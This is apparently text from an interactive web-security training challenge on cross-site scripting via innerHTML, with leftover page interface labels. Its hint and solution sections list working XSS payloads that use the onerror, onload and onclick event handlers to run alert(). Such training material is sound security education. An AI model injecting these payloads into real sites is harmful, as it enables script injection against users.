Xss

InnerHTML

drag_indicator

info

drag_indicator

inputs

drag_indicator

inspect

<script></script> script tags do not work when added via innerHTML, can you find another way to trigger an XSS ?

Goal: alert(flag)

Hints

Hint #1

expand_more

You can use HTML event attribute like onerror or onload to run JavaScript.

Read the solution

expand_more

There is a multitude of event handler you can use to trigger JavaScript execution.

$name = <img src='a:' onerror='alert(name)'>

$name = <svg onload='alert(name)'>

$name = <a onclick='alert(window.name)'>Clickme</a>

drag_indicator

waf

INPUT

OUTPUT

drag_indicator

code

drag_indicator

result